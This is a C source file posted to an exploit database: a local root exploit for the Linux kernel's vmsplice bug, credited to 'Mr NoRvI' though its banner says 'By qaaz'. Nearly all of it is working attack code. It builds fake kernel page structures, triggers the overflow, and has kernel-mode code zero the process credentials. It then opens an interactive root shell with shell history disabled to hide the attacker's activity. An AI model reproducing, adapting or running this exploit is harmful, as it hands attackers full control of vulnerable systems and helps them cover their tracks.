Linux Local Root Exploit

1. Author : Mr NoRvI
2. Email:x_____@w.cn
3. Phone Number:+21376773654
4. Greetz: Inj3ct0r Exploit DataBase 1337day.com
5. /*
6. * Mr NoRvI.c
7. *
8. * Greetz To Arhack.net/vb.
9. * Linux Local Root Exploit
10. * By Mr NoRvI
11. *
12. * Linux 2.6.18 - 2011
13. *
14. * Good_LucK :D
15. *
16. * -static -Wno-format
17. */
18. #define _GNU_SOURCE
19. #include
20. #include
21. #include
22. #include
23. #include
24. #include
25. #include
26. #include
27. #include
28. #include
29. #include
30. #define __KERNEL__
31. #include
32.  
33. #define PIPE_BUFFERS 16
34. #define PG_compound 14
35. #define uint unsigned int
36. #define static_inline static inline __attribute__((always_inline))
37. #define STACK(x) (x + sizeof(x) - 40)
38.  
39. struct page {
40. unsigned long flags;
41. int count;
42. int mapcount;
43. unsigned long private;
44. void *mapping;
45. unsigned long index;
46. struct { long next, prev; } lru;
47. };
48.  
49. void exit_code();
50. char exit_stack[1024 * 1024];
51.  
52. void die(char *msg, int err)
53. {
54. printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
55. fflush(stdout);
56. fflush(stderr);
57. exit(1);
58. }
59.  
60. #if defined (__i386__)
61.  
62. #ifndef __NR_vmsplice
63. #define __NR_vmsplice 316
64. #endif
65.  
66. #define USER_CS 0x73
67. #define USER_SS 0x7b
68. #define USER_FL 0x246
69.  
70. static_inline
71. void exit_kernel()
72. {
73. __asm__ __volatile__ (
74. "movl %0, 0x10(%%esp) ;"
75. "movl %1, 0x0c(%%esp) ;"
76. "movl %2, 0x08(%%esp) ;"
77. "movl %3, 0x04(%%esp) ;"
78. "movl %4, 0x00(%%esp) ;"
79. "iret"
80. : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
81. "i" (USER_CS), "r" (exit_code)
82. );
83. }
84.  
85. static_inline
86. void * get_current()
87. {
88. unsigned long curr;
89. __asm__ __volatile__ (
90. "movl %%esp, %%eax ;"
91. "andl %1, %%eax ;"
92. "movl (%%eax), %0"
93. : "=r" (curr)
94. : "i" (~8191)
95. );
96. return (void *) curr;
97. }
98.  
99. #elif defined (__x86_64__)
100.  
101. #ifndef __NR_vmsplice
102. #define __NR_vmsplice 278
103. #endif
104.  
105. #define USER_CS 0x23
106. #define USER_SS 0x2b
107. #define USER_FL 0x246
108.  
109. static_inline
110. void exit_kernel()
111. {
112. __asm__ __volatile__ (
113. "swapgs ;"
114. "movq %0, 0x20(%%rsp) ;"
115. "movq %1, 0x18(%%rsp) ;"
116. "movq %2, 0x10(%%rsp) ;"
117. "movq %3, 0x08(%%rsp) ;"
118. "movq %4, 0x00(%%rsp) ;"
119. "iretq"
120. : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
121. "i" (USER_CS), "r" (exit_code)
122. );
123. }
124.  
125. static_inline
126. void * get_current()
127. {
128. unsigned long curr;
129. __asm__ __volatile__ (
130. "movq %%gs:(0), %0"
131. : "=r" (curr)
132. );
133. return (void *) curr;
134. }
135.  
136. #else
137. #error "unsupported arch"
138. #endif
139.  
140. #if defined (_syscall4)
141. #define __NR__vmsplice __NR_vmsplice
142. _syscall4(
143. long, _vmsplice,
144. int, fd,
145. struct iovec *, iov,
146. unsigned long, nr_segs,
147. unsigned int, flags)
148.  
149. #else
150. #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
151. #endif
152.  
153. static uint uid, gid;
154.  
155. void kernel_code()
156. {
157. int i;
158. uint *p = get_current();
159.  
160. for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0];
161. pages[0]->count = 1;
162. pages[1]->lru.next = (long) kernel_code;
163.  
164. /*****/
165. pages[2] = *(void **) pages[0];
166. pages[3] = pages[2] + 1;
167.  
168. map_size = PAGE_SIZE;
169. map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
170. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
171. if (map_addr == MAP_FAILED)
172. die("mmap", errno);
173.  
174. memset(map_addr, 0, map_size);
175. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
176. printf("[+] page: 0x%lx\n", pages[2]);
177. printf("[+] page: 0x%lx\n", pages[3]);
178.  
179. pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
180. pages[2]->count = 1;
181. pages[3]->lru.next = (long) kernel_code;
182.  
183. /*****/
184. pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
185. map_size = PAGE_SIZE;
186. map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
187. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
188. if (map_addr == MAP_FAILED)
189. die("mmap", errno);
190. memset(map_addr, 0, map_size);
191. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
192. printf("[+] page: 0x%lx\n", pages[4]);
193.  
194. /*****/
195. map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
196. map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
197. MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
198. if (map_addr == MAP_FAILED)
199. die("mmap", errno);
200.  
201. memset(map_addr, 0, map_size);
202. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
203.  
204. /*****/
205. map_size -= 2 * PAGE_SIZE;
206. if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
207. die("munmap", errno);
208.  
209. /*****/
210. if (pipe(pi) < 0) die("pipe", errno);
211. close(pi[0]);
212.  
213. iov.iov_base = map_addr;
214. iov.iov_len = ULONG_MAX;
215.  
216. signal(SIGPIPE, exit_code);
217. _vmsplice(pi[1], &iov, 1, 0);
218. die("vmsplice", errno);
219. return 0;
220. }
221.  
222.  
223. # 1337day.com [2012-03-27]